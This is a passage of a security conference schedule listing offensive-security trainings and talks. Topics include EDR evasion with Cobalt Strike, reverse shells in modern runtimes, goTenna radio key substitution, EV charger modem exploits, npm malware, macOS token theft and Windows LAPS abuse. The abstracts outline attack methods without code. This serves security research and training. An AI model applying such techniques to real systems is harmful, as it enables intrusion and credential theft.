Participants will learn to emulate various threat-actors safely in a controlled, enterprise level environment. Also, the training will help participants learn to simulate unknown adversaries by choosing a wide variety of offensive tradecraft, TTPs and planning attack simulation engagements effectively.

All machines in the lab environment will be equipped with AV, Web proxy, EDR and other Defense systems. The training management platform will have modules/videos of each attack vector used in the lab environment and step-by-step walkthrough of the attack path. The training is intended to help the attendees to assess the defenses and evaluate the security controls deployed in their organization against motivated adversaries.

This training will provide participants access to a breach simulation lab range, where they will be able to perform a full red team-attack simulation scenario in guided mode. Each step of the attack chain will be explained, along with the TTPs used, starting from initial access to exfiltration.

SpeakerBio:  Abhijith "Abx" B R

Abhijith B R, also known by the pseudonym Abx, has more than a decade of experience in the offensive cyber security industry. He is a professional hacker, offensive cyber security specialist, red team consultant, security researcher, trainer and public speaker.

Currently, he is building Breachsimrange.io and is involved with multiple organizations as a consulting specialist to help them build offensive security operations programs, improve their current security posture, assess cyber defense systems, and bridge the gap between business leadership and security professionals.

Abhijith was responsible for building and managing offensive security operations and adversary simulation for a prominent FinTech company called Envestnet, Inc. In the past, he held the position of Deputy Manager - Cyber Security at Nissan Motor Corporation, and prior to that, he worked as a Senior Security Analyst at EY.

As the founder of Adversary Village (https://adversaryvillage.org/), Abhijith spearheads a community initiative focused on adversary simulation, adversary-tactics, purple teaming, threat actor/ransomware research-emulation, and offensive cyber security. Adversary Village is part of DEF CON Villages and organizes hacking villages at prominent events such as the DEF CON Hacking Conference, RSA Conference etc.

Abx also acts as the Lead of an official DEF CON Group named DC0471. He is actively involved in leading the Tactical Adversary project (https://tacticaladversary.io/), a personal initiative that centers around offensive cyber security, adversary attack simulation and red teaming tradecraft.

Abhijith has spoken at various hacking and cyber security conferences such as, DEF CON hacker convention – Las Vegas, RSA Conference – San Francisco, The Diana Initiative – Las Vegas, DEF CON 28 safemode - DCG Village, Opensource India, Security BSides Las Vegas, BSides San Francisco, Hack Space Con – Kennedy space center Florida, Nullcon – Goa, c0c0n – Kerala, BSides Delhi, etc.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Offensive Development Practitioner Certification (On-Site) by White Knight Labs
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Dive deep into cutting edge techniques that bypass or neuter modern endpoint defenses. Learn how these solutions work to mitigate their utility and hide deep within code on the endpoint. The days of downloading that binary from the internet and pointing it at a remote machine are over. Today’s defenses oftentimes call for multiple bypasses within a single piece of code.

This course is designed to take you deep into defensive and offensive tooling – an apex attacker must know the own indicators of compromise (IOCs) they’re creating and the artifacts they’re leaving behind.

Imagine, you are a novice red teamer and you have been tasked with leading a 16-week full-scope red team engagement against a highly mature Fortune 50 company. No, Metapsloit and Mimikatz are not going to work. Do you take your ball and go home? Nope, it's time to build a lab and see what is going to bypass their tech stack.

Do you phish from the external? Maybe an illicit consent grant in Azure? What loader do I use? Is process injection even going to be necessary? Stop being lost in the offensive cyber sauce; get informed and get to work. WKL's flagship course, Offensive Development, is meant to prepare red teamers and blue teamers for the present day cyberwar. These are not last year's TTPs, WKL will be teaching hyper-current tools and techniques that are being used in current red team operations.

The Offensive Development course is not focused on theory, students will be given a Terraform script that spins up their own isolated AWS lab environment that has several fully patched Windows virtual machines that have various EDR products installed and a fully licensed version of the Cobalt Strike C2 framework.

The pace of finding new offensive cyber techniques that bypass modern detection moves slightly faster than the defense can handle. This course will help red teamers and blue teamers understand the current state of the red/blue war and where the community is heading next, the kernel.

Your lab environment is yours to keep continuing honing your skills. Although the EDR and Cobalt Strike licenses will expire, and the Earth may turn to dust, your AWS lab environment will live forever.

Although the OD course comes with Cobalt Strike, students are free to install whichever C2 framework they're most comfortable with. Students will receive an additional Ubuntu workstation in their lab environment to install whatever additional tooling they feel is necessary.

Speakers:Jake Mayhew,Greg Hatcher

SpeakerBio:  Jake Mayhew

Jake Mayhew is an experienced cybersecurity professional with a particular emphasis on offensive security, especially internal & assumed breach penetration tests. In addition to several years in consulting performing penetration tests & offensive security engagements for clients in a wide range of industries, he has also served on internal red teams and currently leads the red team at UPMC.

SpeakerBio:  Greg Hatcher

Greg Hatcher served seven years as a green beret in the United States Army’s 5th Special Forces Group. During that time, Greg went on multiple combat deployments, working on small teams in austere locations to serve America’s best interests. After Greg transitioned from the military in 2017, he devoted himself to developing a deep understanding of networking and then pivoted quickly to offensive cyber security. He has taught at the NSA and led red teams while contracting for CISA. He has led training at Wild West Hackin’ Fest and virtually on the AntiSyphon platform. Greg has spoken at GrrCON and is an active member of the West Michigan Technology Council. He enjoys spending time with his family, lifting heavy things, and running long distances.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Offensive Development Practitioner Certification (On-Site) by White Knight Labs
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Dive deep into cutting edge techniques that bypass or neuter modern endpoint defenses. Learn how these solutions work to mitigate their utility and hide deep within code on the endpoint. The days of downloading that binary from the internet and pointing it at a remote machine are over. Today’s defenses oftentimes call for multiple bypasses within a single piece of code.

This course is designed to take you deep into defensive and offensive tooling – an apex attacker must know the own indicators of compromise (IOCs) they’re creating and the artifacts they’re leaving behind.

Imagine, you are a novice red teamer and you have been tasked with leading a 16-week full-scope red team engagement against a highly mature Fortune 50 company. No, Metapsloit and Mimikatz are not going to work. Do you take your ball and go home? Nope, it's time to build a lab and see what is going to bypass their tech stack.

Do you phish from the external? Maybe an illicit consent grant in Azure? What loader do I use? Is process injection even going to be necessary? Stop being lost in the offensive cyber sauce; get informed and get to work. WKL's flagship course, Offensive Development, is meant to prepare red teamers and blue teamers for the present day cyberwar. These are not last year's TTPs, WKL will be teaching hyper-current tools and techniques that are being used in current red team operations.

The Offensive Development course is not focused on theory, students will be given a Terraform script that spins up their own isolated AWS lab environment that has several fully patched Windows virtual machines that have various EDR products installed and a fully licensed version of the Cobalt Strike C2 framework.

The pace of finding new offensive cyber techniques that bypass modern detection moves slightly faster than the defense can handle. This course will help red teamers and blue teamers understand the current state of the red/blue war and where the community is heading next, the kernel.

Your lab environment is yours to keep continuing honing your skills. Although the EDR and Cobalt Strike licenses will expire, and the Earth may turn to dust, your AWS lab environment will live forever.

Although the OD course comes with Cobalt Strike, students are free to install whichever C2 framework they're most comfortable with. Students will receive an additional Ubuntu workstation in their lab environment to install whatever additional tooling they feel is necessary.

Speakers:Jake Mayhew,Greg Hatcher

SpeakerBio:  Jake Mayhew

Jake Mayhew is an experienced cybersecurity professional with a particular emphasis on offensive security, especially internal & assumed breach penetration tests. In addition to several years in consulting performing penetration tests & offensive security engagements for clients in a wide range of industries, he has also served on internal red teams and currently leads the red team at UPMC.

SpeakerBio:  Greg Hatcher

Greg Hatcher served seven years as a green beret in the United States Army’s 5th Special Forces Group. During that time, Greg went on multiple combat deployments, working on small teams in austere locations to serve America’s best interests. After Greg transitioned from the military in 2017, he devoted himself to developing a deep understanding of networking and then pivoted quickly to offensive cyber security. He has taught at the NSA and led red teams while contracting for CISA. He has led training at Wild West Hackin’ Fest and virtually on the AntiSyphon platform. Greg has spoken at GrrCON and is an active member of the West Michigan Technology Council. He enjoys spending time with his family, lifting heavy things, and running long distances.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 11:00-11:50 PDT


Title: Old Tactics, New Weapons: Abusing Modern Software Stacks for Reliable Shell Access
When: Saturday, Aug 9, 11:00 - 11:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 3 - Map

Description:

For years, Pentestmonkey Reverse Shell Cheat Sheet defined the essentials of post-exploitation. Bash, Python, PHP, (G)Awk, Netcat and others were quick, simple and highly effective tools for gaining shell access. Today, those tools are the first to be flagged, restricted or removed. In real-world hardened environments, the old paths are closed. Meanwhile, new runtimes like Clojure, Racket, NATS-IO, Bun, Crystal, Red Language, Ballerina and others are becoming part of production environments, CI/CD pipelines and internal developer ecosystems, usually without security teams treating them as risks.

This workshop focuses on building practical, working reverse and bind shells using these modern runtimes. Participants will write their own payloads, test them live against targets and leave with working knowledge of how to survive without traditional tooling. Every shell demonstrated will be integrated into the Metasploit Framework with custom modules built for each runtime. Source code, victim and attacker virtual machines and pre-built environments will be provided to ensure every participant can practice during the session.

This is not a theory-heavy workshop. It is about operational survival when Python is gone, Netcat is restricted and standard shells are no longer viable. It is about turning runtimes that defenders ignore into reliable offensive footholds. Attendees will leave with ready-to-use payloads, working Metasploit extensions, and the technical knowledge to adapt to modern detection-heavy environments.

SpeakerBio:  Roberto Soares

With more than 10 years immersed in Information Security, he is an Information Security Engineer specializing in Red Team. His focus extends to best practices, encompassing application and infrastructure vulnerability assessments, code reviews, and a mix of static and dynamic analyzes to identify vulnerabilities. In addition to his main focus, he has a strong inclination to develop offensive tools. He has contributed more than 25 modules to the core Metasploit framework and registered several CVEs. Additionally, his knowledge covers the complex landscape of macOS security. His curiosity leads him to test non-trivial scenarios, from analyzing cranes that operate containers on ships, to delving into the complexities of embedded systems (SCADA/PLC) and executing advanced attacks on computer networks, that is, his hacker spirit runs through his veins. . He really enjoys breaking and fixing things that contain bits and bytes.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 13:30-14:15 PDT


Title: One Key, Two Key, I Just Stole Your goTenna Key
When: Saturday, Aug 9, 13:30 - 14:15 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

Encrypted radios promise off-grid privacy and security, but what if their core trust anchors can be broken with one message? Our latest research shows that a single, unauthenticated RF packet can overwrite any public keys goTenna Pro stores for peer-to-peer and group chats, silently substituting attacker-controlled keys so that every AES-256 encrypted message is now readable only to the attacker, not the intended recipient; by repeating the swap on both ends the attacker becomes an undetectable man-in-the-middle who alone can forward, alter, or drop traffic, leaving victims blind to compromise. We will live-demo three outcomes: pulling teams into GPS dead zones by injecting phantom coordinates; impersonating a surveillance teammate to feed disinformation and fracture cohesion; and detonating a network-wide blackout that forces operators onto weaker radio communication that allows easy direction-finding. The audience will watch us craft the packet, poison key stores, pivot between victims, and restore normalcy - all from commodity SDR hardware and open-source code released at the session. We close with a hardening guidance and a patch in goTenna Pro version 2.0.3 (CVE-2024-47130) proving once again that cryptography is only as strong as the key lifecycle surrounding it.

Speakers:Erwin "Dollarhyde" Karincic,Woody

SpeakerBio:  Erwin "Dollarhyde" Karincic

Erwin is an experienced security researcher specializing in both hardware and software reverse engineering, binary analysis, and exploit development across a range of processor architectures. He has notable experience in implementing complex Radio Frequency (RF) waveforms using Software Defined Radios (SDRs) for cybersecurity applications, complemented by his proficiency in designing, simulating, and fabricating antennas tailored for such applications. His past work includes extensive TCP/IP networking experience, designing worldwide secure communication systems. Erwin holds a number of prestigious certifications, including OSCP, OSCE, OSWE, OSEE, and CCIE Enterprise Infrastructure. Erwin is also a staff member in the RF Hacker Sanctuary and a member of Security Tribe.

SpeakerBio:  Woody

Woody thinks Linux is a member of the Charlie Brown gang who can lift heavy things but not always spell them. He has had some success with RF exploits in the past with the first ever goTenna exploit talk in the RF wireless village as well as the first attack against Ford Raptor key fobs with RaptorCaptor exploit. Woody’s unique background, familiar to some, gives him a creative aspect to the impact of goTenna Pro research in the physical and RF world. Woody is also a staff member in the RFHacker Sanctuary, a member of Security Tribe, and has appeared on a few episodes of Hak5 describing novel device attacks.


Return to Index    -    Add to Google    -    ics Calendar file

CHV - Saturday - 17:00-17:59 PDT


Title: One Modem to Brick Them All: Exploiting Vulnerabilities in the EV Charging Communication
When: Saturday, Aug 9, 17:00 - 17:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

In this talk we present a collection of attacks against the most widely used EV charging protocol, by exploiting flaws in the underlying power-line communication technologies affecting almost all EVs and chargers.

Specifically, we target the QCA 7000 Homeplug modem series, used by the two most popular EV charging systems, CCS and NACS.

We demonstrate multiple new vulnerabilities in the modems, enabling persistent denial of service.

To better understand the scope of these issues, we conduct a study of EV chargers and vehicles, and show widespread insecurities in existing deployments.

We show a variety of practical real-world scenarios where the HomePlug link can be used to hijack EV charging communications, even at a distance.

Finally, we present results from reverse engineering the firmware and how we can gain code execution.

Speakers:Marcell Szakály,Sebastian Köhler,Jan "SP3ZN45" Berens

SpeakerBio:  Marcell Szakály

Marcell Szakály is a PhD student in the Systems Security Lab at the University of Oxford. His research focuses on the security of the EV charging infrastructure. He received his masters degree in Physics, and worked on superconducting magnet design. His work now involves RF hardware, SDRs, and digital electronics.

SpeakerBio:  Sebastian Köhler

Previous speaker at CarHackingVillage 2023, Redeploying the Same Vulnerabilities: Exploiting Wireless Side-Channels in Electric Vehicle Charging Protocols

SpeakerBio:  Jan "SP3ZN45" Berens

Jan Berens aka SP3ZN45 has been a goon in the QM department for several years now and is working full time as a redteamer at alpitronic SLR the leading manufacturer for DC chargers in Europe. His background is security consulting and penetration testing for critical infrastructures and industrial installations in Europe. Doing mostly non publicly disclosed security research and mentoring of beginners in the security domain.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 10:30-11:15 PDT


Title: One Modem to Brick Them All: Exploiting Vulnerabilities in the EV Charging Communication
When: Saturday, Aug 9, 10:30 - 11:15 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

In this talk we present a collection of attacks against the most widely used EV charging protocol, by exploiting flaws in the underlying power-line communication technologies affecting almost all EVs and chargers.

Specifically, we target the QCA 7000 Homeplug modem series, used by the two most popular EV charging systems, CCS and NACS.

We demonstrate multiple new vulnerabilities in the modems, enabling persistent denial of service.

To better understand the scope of these issues, we conduct a study of EV chargers and vehicles, and show widespread insecurities in existing deployments.

We show a variety of practical real-world scenarios where the HomePlug link can be used to hijack EV charging communications, even at a distance.

Finally, we present results from reverse engineering the firmware and how we can gain code execution.

References:

Speakers:Marcell Szakály,Jan "SP3ZN45" Berens,Sebastian Köhler

SpeakerBio:  Marcell Szakály

Marcell Szakály is a PhD student in the Systems Security Lab at the University of Oxford. His research focuses on the security of the EV charging infrastructure. He received his masters degree in Physics, and worked on superconducting magnet design. His work now involves RF hardware, SDRs, and digital electronics.

SpeakerBio:  Jan "SP3ZN45" Berens

Jan Berens aka SP3ZN45 has been a goon in the QM department for several years now and is working full time as a redteamer at alpitronic SLR the leading manufacturer for DC chargers in Europe. His background is security consulting and penetration testing for critical infrastructures and industrial installations in Europe. Doing mostly non publicly disclosed security research and mentoring of beginners in the security domain.

SpeakerBio:  Sebastian Köhler

Previous speaker at CarHackingVillage 2023, Redeploying the Same Vulnerabilities: Exploiting Wireless Side-Channels in Electric Vehicle Charging Protocols


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 09:00-12:59 PDT


Title: Open Source Malware 101 - Everything you always wanted to know about npm malware (and more)
When: Friday, Aug 8, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N254 - Map

Description:

Software supply chain attacks are out of control! Between 2019 and 2023 software supply chain attacks increased by more than 740% year on year. Things have only gotten worse since then, with attacks like Bybit, Ultralytics, LottieFiles, Polyfills, and of course XZ utils happening in the last 18 months. But how are these supply chain attacks delivered? Often, the attack starts with a malicious npm package.

According to Sonatype, 98.5% of malicious software packages exist in the npm registry. There are several reasons that npm is particularly well suited for delivering malware, and that's why I chose to focus just on npm for this 4 hour workshop.

This hands-on workshop will teach both software engineers, and infosec practitioners how npm malware works. We’ll learn what makes npm malware unique from other software package malware, and how the author has been using his knowledge of npm malware in his research, and to deliver unique offensive security engagements. Most importantly how to identify, analyze, create and defend against malicious NPM packages in this workshop.

The trainer for this workshop, Paul McCarty, is literally writing the book on the subject “Hacking npm”, so he will drop lots of in-depth, never before seen npm techniques.

SpeakerBio:  Paul "6mile" McCarty, Head of Research at Safety

Paul is the Head of Research at Safety (safetycli.com) and a DevSecOps OG. He loves software supply chain research and delivering supply chain offensive security training and engagements. He's spent the last two years deep-diving into npm and has made several discoveries about the ecosystem. Paul founded multiple startups starting in the '90s, with UtahConnect, SecureStack in 2017, and SourceCodeRED in 2023. Paul has worked for NASA, Boeing, Blue Cross/Blue Shield, John Deere, the US military, the Australian government and several startups over the last 30 years.  Paul is a frequent open-source contributor and author of several DevSecOps, software supply chain and threat modelling projects. He’s currently writing a book entitled “Hacking NPM”, and when he’s not doing that, he’s snowboarding with his wife and 3 amazing kids.


Return to Index    -    Add to Google    -    ics Calendar file

BHV - Saturday - 11:00-13:59 PDT


Title: Operation Europa Crisis: A Tabletop Simulation
When: Saturday, Aug 9, 11:00 - 13:59 PDT
Where: LVCCWest-Level1-Hall2-W606 - Map

Description:

A cross-border health emergency is spreading fast and you’re on the front lines of the response. Hospitals are overwhelmed. ICU beds are full. Strange symptoms are emerging in a tight geographic cluster across southern Germany and eastern France. Supply chains are buckling, communications are failing, and trust in public health institutions is unraveling. ​ At the Biohacking Village during DEF CON 33, Operation Europa Crisis invites you to join a gripping, real-time tabletop challenge. ​ 🧠 Step Into the Crisis Take on roles such as: Hospital administrators Health ministry officials Crisis communication leads Frontline clinical staff Supply chain and logistics coordinators CBRN and incident response team ​ Together, you'll investigate the cause, coordinate international response efforts, manage conflicting narratives, and navigate critical decisions in a high-pressure environment.

SpeakerBio:  Nathan Case, CSO at Clarity

Nathan Case is a cybersecurity engineer and executive with over two decades of experience designing, securing, and scaling complex systems across public and private sectors. He currently serves as the Vice President of Cloud Computing and Cyber Solutions at Clarity, leading efforts at the intersection of secure cloud architecture, AI engineering, and national defense. In this role, he provides technical direction, manages multidisciplinary teams, and collaborates closely with government stakeholders to deliver operationally effective solutions that meet mission-critical needs.


Return to Index    -    Add to Google    -    ics Calendar file

ADV - Saturday - 15:30-15:59 PDT


Title: Operational Twilight: APTs, OT, and the geopolitics of a dying climate
When: Saturday, Aug 9, 15:30 - 15:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

We’re trying to debug the end of the world through trial and error — mostly error. In the middle of a worsening climate crisis, outdated OT protocols like Modbus are being exploited by state-sponsored actors in ways that turn environmental infrastructure into geopolitical weapons. From hijacked dams running Windows 95-era code to smart thermostats recruited into botnets fighting over Arctic oil, the climate-tech battlefield is already here.

This session dives into how APTs are quietly compromising the systems designed to save the planet. We’ll examine real-world campaigns where threat actors have targeted energy grids, carbon capture labs, and EV infrastructure — and how climate action is being derailed by 1970s-era code and modern apathy.

This is Cyber Threat Intelligence meets Climate Fiction (Cli-Fi). It’s weird, terrifying, and very real.

SpeakerBio:  Cybelle Oliveira, Cyber Threat Intelligence Researcher at Malwarelandia

Cybelle Oliveira is a Cyber Threat Intelligence researcher and a Master’s student in Cyber Intelligence. She teaches in a postgraduate CTI specialization program in Brazil and is the co-founder of La Villa Hacker — the first DEF CON village dedicated to the Portuguese and Spanish-speaking community. Cybelle has spoken at some of the world’s leading security conferences, including DEF CON, BSides Las Vegas/São Paulo/Rio de Janeiro, 8.8 Chile, Cryptorave, Radical Networks, Mozilla Festival, and many others. Her work often explores the intersection of cyber threats, geopolitics, and underreported regions, with a particular interest in the strange, obscure, and catastrophically messy corners of cybersecurity.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 11:30-12:15 PDT


Title: Original Sin of SSO: macOS PRT Cookie Theft & Entra ID Persistence via Device Forgery
When: Saturday, Aug 9, 11:30 - 12:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

While the theft of Primary Refresh Token (PRT) cookies on Windows has been extensively studied, similar attacks on macOS remain unexplored. As organizations increasingly use Microsoft Intune to manage both Windows and macOS devices, a critical question arises: can attackers also extract PRT cookies from macOS?

In this talk, we present our research into Microsoft’s SSO implementation within the Intune Company Portal for macOS. We compare authentication flows and security controls between Windows and macOS, exposing weaknesses that allow attackers to bypass process validation and obtain authentication tokens under certain conditions.

Another obstacle for attackers has been Microsoft’s efforts to make it more difficult to register new devices using stolen credentials for persistence. Our research introduces a novel technique: once an attacker acquires a token with an MFA claim on the device, they can still register new devices and generate new tokens without concern for the original stolen token’s expiration.

We will demonstrate PRT Cookie extraction on macOS and release a proof-of-concept tool, showing not only how credential theft techniques can now extend beyond Windows to macOS environments, but also how attackers can leverage these techniques for long-term persistence.

References:

Speakers:Shang-De "HackerPeanutJohn" Jiang,Dong-Yi "Kazma Ye" Ye,Tung-Lin "Echo Lee" Lee

SpeakerBio:  Shang-De "HackerPeanutJohn" Jiang

Shang-De Jiang is a deputy director of the research team of CyCraft. Currently, he focuses on research on Incident Response and Endpoint Security and Microsoft Security. He has presented technical presentations in non-academic technical conferences, such as TROOPERS, HITB, HITCON, CodeBlue, Blue Team Summit and BlackHat USA. He is the co-founder of UCCU Hacker the private hacker group in Taiwan.

SpeakerBio:  Dong-Yi "Kazma Ye" Ye

Kazma is a university student from Taiwan and cybersecurity intern of CyCraft. His current work focuses on how Microsoft Entra ID integrates and behaves on macOS, diving deep into binary internals and real-world authentication logic. He’s also a CTF player with the B33F 50UP team, with a passion for reverse engineering and binary exploitation.

SpeakerBio:  Tung-Lin "Echo Lee" Lee

Echo is a cybersecurity researcher at CyCraft Technology, specializing in network and cloud security. He has presented at industry conferences, including DEVCORECONF, HITCON ENT, ROOTCON, InfoSec Taiwan, and CyberSec.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 17:00-17:45 PDT


Title: Orion - fuzzing workflow automation
When: Friday, Aug 8, 17:00 - 17:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

"Fuzzing" is an automated software testing technique essential for detecting security vulnerabilities, effectively identifying over 100,000 bugs across the industry.

While fuzzing has proven effective in uncovering critical issues, software teams often face challenges when implementing the fuzzing process. Teams must spend significant time identifying targets for fuzzing and creating test harnesses with initial inputs. Finally, engineering teams must analyze and fix issues detected by fuzzing.

We created an automated fuzzing solution that leverages LLMs for the codebase analysis to identify optimal fuzzing targets, generating precise fuzzing test harnesses and initial seed inputs.

Our solution automates the reproduction of bugs discovered during fuzzing and generates patches for the affected code.

We achieved significant improvements across all targeted areas, demonstrating the effectiveness of integrating LLMs and automatic code analysis into the fuzzing process.

References:

  1. Google published some work on the smart harness generation with LLMs - link
  2. Google published work on identifying fuzzing targets (without LLMs) - link
Speakers:Max Bazalii,Marius Fleischer

SpeakerBio:  Max Bazalii

Max Bazalii is a Principal Engineer on the NVIDIA DriveOS Offensive Security team, where he leads AI automation projects focusing on software security and formal verification. Prior to joining NVIDIA, he specialized in the security research of mobile operating systems. He has authored numerous publications and delivered technical presentations on jailbreaking Apple platforms, including the first public jailbreak of the Apple Watch. He also served as a lead security researcher on the Trident exploits during the first Pegasus iOS spyware incident. Max holds a Ph.D. in Computer Science, with a focus on software security.

SpeakerBio:  Marius Fleischer

Marius Fleischer is a security engineer at the NVIDIA DriveOS offensive security team. He is passionate about applying advancements in AI to tackle security challenges and has a deep interest in low-level software. Previously, Marius worked at the Security Lab of UC Santa Barbara, where he contributed to advancing the state-of-the-art in automated vulnerability detection for operating system kernels.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Sunday - 10:00-11:55 PDT


Title: OSINT Challenges
When: Sunday, Aug 10, 10:00 - 11:55 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Tactics 3 - Map

Description:

A series of OSINT Challenges to teach techniques useful in various Cybersecurity related areas.

Speakers:Alex Ackerman,Lee McWhorter,Sandra Stibbards

SpeakerBio:  Alex Ackerman

00101010

SpeakerBio:  Lee McWhorter

Lee McWhorter, Owner & Chief Geek at McWhorter Technologies, has been involved in IT since his early days and has over 30 years of experience. He is a highly sought after professional who first learned about identifying weaknesses in computer networks, systems, and software when Internet access was achieved using a modem. Lee holds an MBA and more than 20 industry certifications in such areas as System Admin, Networking, Programming, Linux, IoT, and Cybersecurity. His roles have ranged from the server room to the board room, and he has taught for numerous universities, commercial trainers, and nonprofits. Lee works closely with the Dark Arts Village at RSAC, Red Team Village at DEFCON, Texas Cyber Summit, CompTIA, and the CompTIA Instructor Network as a Speaker, SME, and Instructor.

SpeakerBio:  Sandra Stibbards

Sandra Stibbards opened her investigation agency, Camelot Investigations, in 1996. Currently, she maintains a private investigator license in the state of California. Sandra specializes in financial fraud investigations, competitive intelligence, counterintelligence, business and corporate espionage, physical penetration tests, online vulnerability assessments, brand protection/IP investigations, corporate due diligence, and Internet investigations. Sandra has conducted investigations internationally in five continents and clients include several Fortune 500 and international companies. Sandra has been providing training seminars and presentations on Open Source Intelligence (OSINT) internationally since 2010 to federal governments and corporations.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 12:00-13:50 PDT


Title: OSINT for Hackers
When: Friday, Aug 8, 12:00 - 13:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 4 - Map

Description:

In this Workshop, attendees will learn some of the most impactful techniques and tools to increase the value of OSINT to their organizations. A guided learning experience, instructors will immerse attendees in hands-on exercises.

Speakers:Lee McWhorter,Sandra Stibbards

SpeakerBio:  Lee McWhorter

Lee McWhorter, Owner & Chief Geek at McWhorter Technologies, has been involved in IT since his early days and has over 30 years of experience. He is a highly sought after professional who first learned about identifying weaknesses in computer networks, systems, and software when Internet access was achieved using a modem. Lee holds an MBA and more than 20 industry certifications in such areas as System Admin, Networking, Programming, Linux, IoT, and Cybersecurity. His roles have ranged from the server room to the board room, and he has taught for numerous universities, commercial trainers, and nonprofits. Lee works closely with the Dark Arts Village at RSAC, Red Team Village at DEFCON, Texas Cyber Summit, CompTIA, and the CompTIA Instructor Network as a Speaker, SME, and Instructor.

SpeakerBio:  Sandra Stibbards

Sandra Stibbards opened her investigation agency, Camelot Investigations, in 1996. Currently, she maintains a private investigator license in the state of California. Sandra specializes in financial fraud investigations, competitive intelligence, counterintelligence, business and corporate espionage, physical penetration tests, online vulnerability assessments, brand protection/IP investigations, corporate due diligence, and Internet investigations. Sandra has conducted investigations internationally in five continents and clients include several Fortune 500 and international companies. Sandra has been providing training seminars and presentations on Open Source Intelligence (OSINT) internationally since 2010 to federal governments and corporations.


Return to Index    -    Add to Google    -    ics Calendar file

ICSV - Saturday - 14:00-14:30 PDT


Title: OT Network Segmentation Planning, Implementation, and Validation
When: Saturday, Aug 9, 14:00 - 14:30 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

This presentation will provide ICS security practitioners with a comprehensive introduction to Operational Technology (OT) network segmentation. As industrial control systems face increasing cyber threats, proper network segmentation has become a critical security control to limit attack surfaces and protect critical infrastructure.

Attendees will learn practical approaches to planning segmentation architectures, implementing controls across OT environments, and validating the effectiveness of their segmentation strategy.

The session blends theoretical concepts with practical implementation guidance suitable for security practitioners with introductory to intermediate knowledge of industrial control systems.

Key topics include: OT Network Segmentation Fundamentals (objectives, benefits, IT/OT differences, reference architectures); Planning Strategies (asset inventory, flow analysis, zone design, risk-based requirements, legacy systems); Implementation Approaches (physical vs. logical separation, DMZs, deep packet inspection, data diodes, appropriate tools); Validation Methods (verification techniques, safe penetration testing, monitoring, measuring success); and Real-World Case Studies with lessons learned and common challenges.

This session is designed for industrial cybersecurity professionals, control system engineers, IT/OT security architects, and other stakeholders responsible for securing operational technology environments. Attendees should have basic familiarity with industrial control systems and networking concepts.

SpeakerBio:  Tony Turner, Frenos

Tony is a seasoned security architect with over 25 years of experience spanning both IT and OT cybersecurity domains. As VP of Product at Frenos, he leads an AI-driven platform that automates security assessments for operational technology environments.

His diverse background includes critical infrastructure protection at a major US airport, incident command for state government public health systems, engineering disaster recovery operations for hurricane response, and security implementations for global semiconductor and integrated circuit manufacturing facilities.

Tony has developed specialized expertise in vulnerability management, security hardening, application security, secure network infrastructure, supply chain risk management, and Cyber Informed Engineering (CIE). He authored "Software Transparency" and developed the SANS SEC547 course "Defending Product Supply Chains."

As OWASP Orlando chapter lead and Chief Editor for cyberinformedengineering.com, Tony actively promotes security best practices within the industrial community. He also leads defendics.org, a nonprofit focused on advancing Cybersecurity Performance Goals (CPG) and foundational OT security practices for resource-constrained asset owners.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 17:30-17:50 PDT


Title: OverLAPS: Overriding LAPS Logic
When: Saturday, Aug 9, 17:30 - 17:50 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

Local Administrator Password Solution (LAPS) automates local admin password rotation and secure storage in Active Directory (AD) or Microsoft Entra ID. It ensures that each system has a unique and strong password.

In OverLAPS: Overriding LAPS Logic, we will revisit and extend our previous research (Malicious use of "Local Administrator Password Solution", Hack.lu 2017) by exposing client-side attacks in Windows LAPS ("LAPSv2"). After a brief overview of LAPS's evolution, from clear-text fields in AD with Microsoft LAPS ("LAPSv1") to encrypted AD attributes or Entra ID storage with Windows LAPS, we will explore the client-side logic of Windows LAPS. Unlike prior work that exfiltrates passwords only after directory compromise, we will focus on abusing LAPS to maintain presence on compromised endpoints, both on-prem and Entra-joined devices.

We will leverage PDB symbols and light static analysis to understand how LAPS works internally, then use Frida for dynamic hooking to capture, manipulate, and rotate admin passwords on demand. We will also reproduce Frida proof-of-concepts using Microsoft Detours for in-process hooks.

Attendees will gain practical insights into new attack vectors against Windows LAPS, enabling them to assess, reproduce, and defend against client-side attacks in their own environments.

References:

SpeakerBio:  Antoine Goichot

